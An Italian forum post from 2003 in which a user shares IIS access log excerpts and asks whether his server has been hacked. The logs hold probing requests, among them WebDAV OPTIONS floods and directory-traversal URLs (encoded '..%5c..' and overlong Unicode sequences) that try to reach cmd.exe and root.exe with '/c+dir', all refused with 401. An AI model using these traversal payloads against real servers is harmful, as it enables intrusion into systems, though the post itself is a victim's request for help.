file di log IIS - sono stato hakerato?

**nik600** · 16-10-2003, 14:51

ciao ragazzi non mene intendo molto di file di log...ma guardarno qesti pezzetti di file a me sembra che qualcuno abbia voluto lanciare il prompt dei comandi o cos'altro! e si che la porta 80 su firewall è chiusa!!

prima c'è sto pezzo: guardate l'ora!

#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2003-10-11 01:28:41 62.194.101.101 - 192.168.100.105 80 GET /scripts/nsiislog.dll - 401 -
2003-10-11 02:57:17 80.140.104.46 - 192.168.100.105 80 OPTIONS / - 401 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-10-11 02:57:18 80.140.104.46 - 192.168.100.105 80 OPTIONS / - 401 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-10-11 02:57:20 80.140.104.46 - 192.168.100.105 80 OPTIONS / - 401 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-10-11 02:57:22 80.140.104.46 - 192.168.100.105 80 OPTIONS / - 401 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-10-11 02:57:24 80.140.104.46 - 192.168.100.105 80 OPTIONS / - 401 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-10-11 02:57:25 80.140.104.46 - 192.168.100.105 80 OPTIONS / - 401 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-10-11 02:57:28 80.140.104.46 - 192.168.100.105 80 OPTIONS / - 401 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-10-11 02:57:29 80.140.104.46 - 192.168.100.105 80 OPTIONS / - 401 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-10-11 02:57:31 80.140.104.46 - 192.168.100.105 80 OPTIONS / - 401 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-10-11 02:57:33 80.140.104.46 - 192.168.100.105 80 OPTIONS / - 401 Microsoft-WebDAV-MiniRedir/5.1.2600

e qui?

2003-10-13 16:24:07 152.99.72.82 - 192.168.100.105 80 GET /scripts/nsiislog.dll - 401 -
2003-10-13 21:55:30 195.25.165.15 - 192.168.100.105 80 GET /scripts/root.exe /c+dir 401 -
2003-10-13 21:55:30 195.25.165.15 - 192.168.100.105 80 GET /MSADC/root.exe /c+dir 401 -
2003-10-13 21:55:30 195.25.165.15 - 192.168.100.105 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:31 195.25.165.15 - 192.168.100.105 80 GET /d/winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:31 195.25.165.15 - 192.168.100.105 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:31 195.25.165.15 - 192.168.100.105 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:32 195.25.165.15 - 192.168.100.105 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:32 195.25.165.15 - 192.168.100.105 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:32 195.25.165.15 - 192.168.100.105 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:34 195.25.165.15 - 192.168.100.105 80 GET /scripts/winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:34 195.25.165.15 - 192.168.100.105 80 GET /winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:34 195.25.165.15 - 192.168.100.105 80 GET /winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:35 195.25.165.15 - 192.168.100.105 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:35 195.25.165.15 - 192.168.100.105 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:35 195.25.165.15 - 192.168.100.105 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2003-10-13 21:55:36 195.25.165.15 - 192.168.100.105 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 -

sapreste aiutarmi? grazie

Discussione: file di log IIS - sono stato hakerato?

Strumenti discussione

Ricerca discussione

Visualizza

Visualizzazione discussione

file di log IIS - sono stato hakerato?

Permessi di invio